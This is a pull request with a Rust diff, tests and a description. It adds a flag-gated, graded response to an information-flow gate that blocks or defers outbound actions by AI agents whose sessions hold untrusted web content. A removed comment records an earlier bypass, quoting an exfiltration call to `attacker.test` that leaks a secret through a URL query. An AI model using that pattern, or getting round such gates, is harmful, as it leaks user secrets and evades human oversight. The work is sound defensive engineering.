### PR TITLE
Option C increment 2: wire the graded taint response behind a default-off flag

### DIFF
--- a/crates/portcullis/src/exposure_core.rs
+++ b/crates/portcullis/src/exposure_core.rs
@@ -92,64 +92,105 @@ pub fn sink_max_conf_for(op: Operation) -> ConfLevel {
     }
 }
 
+/// Three-way outcome of the egress gate.
+///
+/// `ifc_egress_denial` returns `Option<String>` and so can only say deny-or-not.
+/// Grading needs a third answer, because the whole point is that a refusal at a
+/// cheap sink should become a question for a human rather than a dead end.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum EgressVerdict {
+    /// The gate has nothing to say; fall through to the normal decision path.
+    Pass,
+    /// Refuse.
+    Deny(String),
+    /// Defer to a human. Only ever produced when grading is enabled.
+    RequireApproval(String),
+}
+
+/// The egress gate, with the taint response optionally graded by sink
+/// consequence (Option C).
+///
+/// `graded = false` reproduces the historical behaviour EXACTLY: any integrity
+/// taint denies every outbound action. That is the default, so enabling the
+/// grading is a config change and disabling it is a config rollback — the one
+/// change here that can let through something previously refused stays a flag
+/// flip, not a redeploy.
+///
+/// `graded = true` keeps the DETECTION identical (the session ceiling still
+/// decides whether taint is present — no lineage, no trusting the agent's
+/// account of its own data flow) and grades only the RESPONSE, via
+/// [`graded_taint_response`]. Measured over the sink-consequence corpus: of the
+/// refusals caused purely by taint, expensive sinks stay denied, pod-local
+/// reversible ones become approvable, and nothing is silently permitted.
+///
+/// The confidentiality check is NOT graded. A session holding secrets must not
+/// emit them regardless of how cheap the sink looks, and unlike integrity there
+/// is no "the session already lost this" argument to make.
+pub fn ifc_egress_verdict(
+    flow: &FlowTracker,
+    op: Operation,
+    kind: NodeKind,
+    graded: bool,
+) -> EgressVerdict {
+    let is_outbound_action = kind == NodeKind::OutboundAction;
+    let carries_data_out =
+        is_outbound_action || crate::capability::default_sink_class(op).is_exfil_vector();
+    if !carries_data_out {
+        return EgressVerdict::Pass;
+    }
+
+    if is_outbound_action && flow.is_tainted() {
+        let detail = format!(
+            "session carries adversarial integrity (untrusted/web content was \
+             observed); outbound operation {op:?} blocked to prevent exfiltration \
+             of, or action on, injected content"
+        );
+        if !graded {
+            return EgressVerdict::Deny(detail);
+        }
+        match graded_taint_response(op) {
+            TaintResponse::Deny => return EgressVerdict::Deny(detail),
+            TaintResponse::RequireApproval => {
+                return EgressVerdict::RequireApproval(format!(
+                    "{detail}; sink is pod-local and reversible, so this is \
+                     deferred for human approval rather than refused"
+                ))
+            }
+            // Fall through to the confidentiality check — an Allow here means
+            // "integrity does not block this", never "nothing else might".
+            TaintResponse::Allow => {}
+        }
+    }
+
+    if flow
+        .session_exfiltration_check(sink_max_conf_for(op))
+        .is_denied()
+    {
+        return EgressVerdict::Deny(format!(
+            "session confidentiality ceiling exceeds what {op:?} may emit; \
+             outbound operation blocked to prevent secret exfiltration"
+        ));
+    }
+    EgressVerdict::Pass
+}
+
 /// Clock-free IFC egress denial check for the live kernel gate (most-paranoid
 /// #1/#4). Returns `Some(detail)` when an outbound operation must be denied:
 /// either the session is integrity-tainted (adversarial content observed) or its
 /// confidentiality ceiling exceeds what the sink may emit (secret exfiltration).
 /// `None` ⇒ the gate falls through to the normal decision path.
 pub fn ifc_egress_denial(flow: &FlowTracker, op: Operation, kind: NodeKind) -> Option<String> {
-    // An operation is an egress point if the kernel classifies its flow node as
-    // an outbound action, OR if its sink class can move data out of the trust
-    // boundary.
-    //
-    // The second clause fixes a real bypass. `node_kind_for` maps `WebFetch` and
-    // `WebSearch` to `NodeKind::WebContent` — correct, they ingest — but the
-    // gate used to return early for any kind that was not `OutboundAction`, so
-    // BOTH checks below were skipped for them. Meanwhile
-    // `default_sink_class(WebFetch)` is `HTTPEgress`, whose `is_exfil_vector()`
-    // is `true`: nucleus called web fetch an exfiltration vector in one file and
-    // exempted it from the exfiltration gate in another.
-    //
-    // Measured before the fix: in a session already tainted by web content,
-    // `WebFetch("https://attacker.test/collect?leak=SECRET")` was ALLOWED under a
-    // permissive lattice, while a local `WriteFiles` was denied — the more direct
-    // exfiltration channel was the one left open. A restrictive lattice happened
-    // to refuse it, but on capability grounds (`WebFetch@LowRisk exceeds Never`),
-    // which is incidental: a pod only becomes tainted by fetching web content, so
-    // the pods at risk are exactly the ones with `WebFetch` enabled and the
-    // capability gate silent.
-    //
-    // A URL carries a query string, so this is a data-carrying channel and
-    // belongs to the same gate as every other one.
-    let is_outbound_action = kind == NodeKind::OutboundAction;
-    let carries_data_out =
-        is_outbound_action || crate::capability::default_sink_class(op).is_exfil_vector();
-    if !carries_data_out {
-        return None;
+    // Delegates rather than duplicating: two copies of an enforcement rule are
+    // two things that can drift, and this one has already drifted once (the
+    // web-egress bypass). `graded = false` is the historical behaviour.
+    match ifc_egress_verdict(flow, op, kind, false) {
+        EgressVerdict::Deny(d) => Some(d),
+        // Unreachable with `graded = false`, but mapped to a denial rather than
+        // to `None` so that a future edit which starts producing it here fails
+        // closed instead of silently permitting.
+        EgressVerdict::RequireApproval(d) => Some(d),
+        EgressVerdict::Pass => None,
     }
-    // INTEGRITY applies only to true outbound ACTIONS. A web fetch is an ingest:
-    // it reads more adversarial content into a session that is already
-    // adversarially tainted, which adds no integrity the session lacks. Denying
-    // it on this axis would end multi-page research after the first page and buy
-    // nothing — the instinct behind `tainted_session_allows_web_fetch` is right
-    // on this axis, even though its stated reason was mechanical.
-    if is_outbound_action && flow.is_tainted() {
-        return Some(format!(
-            "session carries adversarial integrity (untrusted/web content was \
-             observed); outbound operation {op:?} blocked to prevent exfiltration \
-             of, or action on, injected content"
-        ));
-    }
-    if flow
-        .session_exfiltration_check(sink_max_conf_for(op))
-        .is_denied()
-    {
-        return Some(format!(
-            "session confidentiality ceiling exceeds what {op:?} may emit; \
-             outbound operation blocked to prevent secret exfiltration"
-        ));
-    }
-    None
 }
 
 /// Project what the exposure set WOULD be if this operation executes.
@@ -789,6 +830,107 @@ mod web_egress_bypass_tests {
                 sink_max_conf_for(op) < ConfLevel::Secret,
                 "{op:?} capped at {:?}: a Secret cap can never be exceeded",
                 sink_max_conf_for(op)
+            );
+        }
+    }
+}
+
+#[cfg(test)]
+mod graded_gate_tests {
+    use super::*;
+    use portcullis_core::flow::NodeKind;
+    use portcullis_core::ifc_api::FlowTracker;
+
+    fn tainted() -> FlowTracker {
+        let mut f = FlowTracker::new();
+        f.observe(NodeKind::WebContent).expect("observe");
+        f
+    }
+
+    /// **The rollback guarantee.** With grading off, every outcome must be
+    /// byte-identical to the historical gate. If this ever fails, the flag is
+    /// not a safe default and the change is not a config rollback.
+    #[test]
+    fn ungraded_matches_the_historical_gate_on_every_operation() {
+        let flow = tainted();
+        for op in Operation::ALL {
+            for kind in [
+                NodeKind::OutboundAction,
+                NodeKind::WebContent,
+                NodeKind::FileRead,
+            ] {
+                let legacy = ifc_egress_denial(&flow, op, kind);
+                let ungraded = ifc_egress_verdict(&flow, op, kind, false);
+                match (&legacy, &ungraded) {
+                    (Some(a), EgressVerdict::Deny(b)) => assert_eq!(a, b, "{op:?}/{kind:?}"),
+                    (None, EgressVerdict::Pass) => {}
+                    other => panic!("{op:?}/{kind:?} diverged: {other:?}"),
+                }
+            }
+        }
+    }
+
+    /// Grading must never produce an approval for a sink that can move data out
+    /// or leave an artifact someone else can see. This is the property that
+    /// makes the flag safe to turn on at all.
+    #[test]
+    fn grading_never_defers_an_expensive_sink() {
+        let flow = tainted();
+        for op in Operation::ALL {
+            let sink = portcullis_core::default_sink_class(op);
+            if !(sink.is_exfil_vector() || sink.requires_verified_derivation()) {
+                continue;
+            }
+            let v = ifc_egress_verdict(&flow, op, NodeKind::OutboundAction, true);
+            assert!(
+                !matches!(v, EgressVerdict::RequireApproval(_)),
+                "{op:?} -> {sink:?} is externally visible; got {v:?}"
+            );
+        }
+    }
+
+    /// Grading must actually change something, or the flag is decoration.
+    #[test]
+    fn grading_defers_at_least_one_operation_the_old_gate_refused() {
+        let flow = tainted();
+        let deferred: Vec<_> = Operation::ALL
+            .iter()
+            .filter(|op| {
+                ifc_egress_denial(&flow, **op, NodeKind::OutboundAction).is_some()
+                    && matches!(
+                        ifc_egress_verdict(&flow, **op, NodeKind::OutboundAction, true),
+                        EgressVerdict::RequireApproval(_)
+                    )
+            })
+            .collect();
+        assert!(!deferred.is_empty(), "grading changed nothing");
+    }
+
+    /// Confidentiality is NOT graded: a secret-bearing session is refused even
+    /// at a sink the grading would otherwise defer. Without this, enabling the
+    /// flag would open the exfiltration path the previous PR just closed.
+    #[test]
+    fn grading_does_not_relax_the_confidentiality_check() {
+        let mut flow = FlowTracker::new();
+        flow.observe(NodeKind::Secret).expect("observe a secret");
+        for op in [Operation::WebFetch, Operation::WebSearch] {
+            let v = ifc_egress_verdict(&flow, op, NodeKind::WebContent, true);
+            assert!(
+                matches!(v, EgressVerdict::Deny(_)),
+                "{op:?} must stay denied for a secret-bearing session even when graded, got {v:?}"
+            );
+        }
+    }
+
+    /// A clean session is unaffected by the flag in either position.
+    #[test]
+    fn a_clean_session_is_unaffected_by_grading() {
+        let flow = FlowTracker::new();
+        for op in Operation::ALL {
+            assert_eq!(
+                ifc_egress_verdict(&flow, op, NodeKind::OutboundAction, false),
+                ifc_egress_verdict(&flow, op, NodeKind::OutboundAction, true),
+                "{op:?} differs on a clean session"
             );
         }
     }

--- a/crates/portcullis/src/kernel/ifc.rs
+++ b/crates/portcullis/src/kernel/ifc.rs
@@ -94,17 +94,73 @@ impl Kernel {
         // what the sink may emit (secret exfiltration). The combined
         // integrity+confidentiality check lives in `exposure_core`.
         let kind = Kernel::node_kind_for(operation);
-        if let Some(detail) = exposure_core::ifc_egress_denial(flow, operation, kind) {
-            tracing::warn!(
-                ?operation,
-                subject = term.subject(),
-                %detail,
-                "IFC denied outbound action"
-            );
-            return Some(self.ifc_deny(term.clone(), detail));
+        match exposure_core::ifc_egress_verdict(flow, operation, kind, Self::graded_taint_enabled())
+        {
+            exposure_core::EgressVerdict::Deny(detail) => {
+                tracing::warn!(
+                    ?operation,
+                    subject = term.subject(),
+                    %detail,
+                    "IFC denied outbound action"
+                );
+                Some(self.ifc_deny(term.clone(), detail))
+            }
+            exposure_core::EgressVerdict::RequireApproval(detail) => {
+                tracing::info!(
+                    ?operation,
+                    subject = term.subject(),
+                    %detail,
+                    "IFC deferred outbound action to human approval"
+                );
+                Some(self.ifc_requires_approval(term.clone(), detail))
+            }
+            exposure_core::EgressVerdict::Pass => None,
         }
+    }
 
-        None
+    /// Whether the graded taint response (Option C) is enabled.
+    ///
+    /// Default OFF. Read from the environment at each decision rather than
+    /// cached, so flipping it is a config change with no restart and rolling it
+    /// back is the same — this is the only switch here that can permit something
+    /// previously refused, so it stays as reversible as possible.
+    fn graded_taint_enabled() -> bool {
+        std::env::var("NUCLEUS_GRADED_TAINT")
+            .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
+            .unwrap_or(false)
+    }
+
+    /// Shared IFC deferral path: records a `RequiresApproval` decision so the
+    /// operation can be unblocked through `/v1/approve` (nonce-checked,
+    /// expiry-bounded) instead of dying at an opaque refusal — and so the
+    /// deferral lands in the Article 12 record as Article 14 human oversight.
+    fn ifc_requires_approval(
+        &mut self,
+        term: ActionTerm,
+        _detail: String,
+    ) -> (Decision, Option<DecisionToken>) {
+        let operation = term.operation();
+        let subject = term.subject().to_string();
+        let pre_hash = self.effective.checksum();
+        let pre_exposure_count = self.exposure.count();
+        let contributed_label = exposure_core::classify_operation(operation);
+        let (mut decision, token) = self.record_with_exposure(
+            operation,
+            &subject,
+            Verdict::RequiresApproval,
+            &pre_hash,
+            pre_exposure_count,
+            contributed_label,
+            false,
+            // This IS a dynamic gate: the deferral is caused by accumulated
+            // session state, not by a static obligation in the lattice.
+            true,
+        );
+        decision.action_term = Some(term.clone());
+        if let Some(last) = self.trace.last_mut() {
+            last.action_term = Some(term);
+        }
+        (decision, token)
     }
 
     /// Shared IFC denial path: records a `Deny(IfcUnsafe { detail })` decision


### PR DESCRIPTION
## What this does

`NUCLEUS_GRADED_TAINT=1` enables the graded response. **Default is OFF, so this changes no deployed behaviour.** The flag is read per decision rather than cached — turning it on is a config change, turning it off is a config rollback. This is the only switch in the arc that can permit something previously refused, so it stays as reversible as possible.

## What is graded, and what is not

**Detection is untouched.** The session ceiling still decides whether taint is present — no lineage required, and no asking the agent to account for its own data flow. Only the *response* is graded, via `graded_taint_response` (landed unwired in #2131): expensive sinks stay denied, pod-local reversible ones defer to a human, nothing is silently permitted.

**Confidentiality is deliberately not graded.** A session holding secrets must not emit them however cheap the sink looks — and unlike integrity, there's no "the session has already lost this" argument available. A test pins it: with grading **on**, a secret-bearing session is still refused at `WebFetch`/`WebSearch`, so enabling the flag cannot reopen the exfiltration path #2132 just closed.

## One implementation, not two

`ifc_egress_denial` now delegates to `ifc_egress_verdict(.., graded=false)` rather than keeping a second copy of the rule. Two copies of an enforcement rule are two things that can drift — and this one has drifted once already (the web-egress bypass). Its `RequireApproval` arm, unreachable while ungraded, maps to a **denial** rather than `None`, so a future edit that starts producing it fails closed.

`RequiresApproval` is a real outcome, not a dressed-up refusal: it reaches `/v1/approve` (nonce-checked, expiry-bounded, rate-limited) and, since #2127, lands in the Article 12 record as Article 14 human oversight.

## Evidence

**Flag OFF** — 35 suites, zero failures. A test asserts the ungraded path is outcome-identical to the historical gate across every `Operation` × `NodeKind` pair. *If that test ever fails, the default is not safe and this is not a rollback.*

**Flag ON** — exactly three tests flip:

- `tainted_session_denies_write`
- `trifecta_ordering_blocks_exfil_after_web`
- `denied_kernel_decision_is_recorded_with_its_reason`

Verified they fail for the **right reason**, end-to-end through the real mediation layer:

```
expected IfcDenied, got ApprovalRequired { operation: "WriteFiles out.txt" }
```

Those three encode the *ungraded* policy and are correct for today's default. Whoever flips the default must update exactly them — and their flipping is the evidence the wiring works, not a regression.

## Anti-vacuity

One test fails if grading changes nothing (decoration), one if it ever defers an exfil or hard-to-revoke sink, one if a clean session is affected at all.

## Gates

`clippy --workspace --all-targets --all-features -D warnings` · `cargo hack check --each-feature --no-dev-deps` · `fmt --check` · `check-line-ratchet --strict` — all green. Aeneas fence untouched.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01UA8kchV3eadjGv6BmJXfqm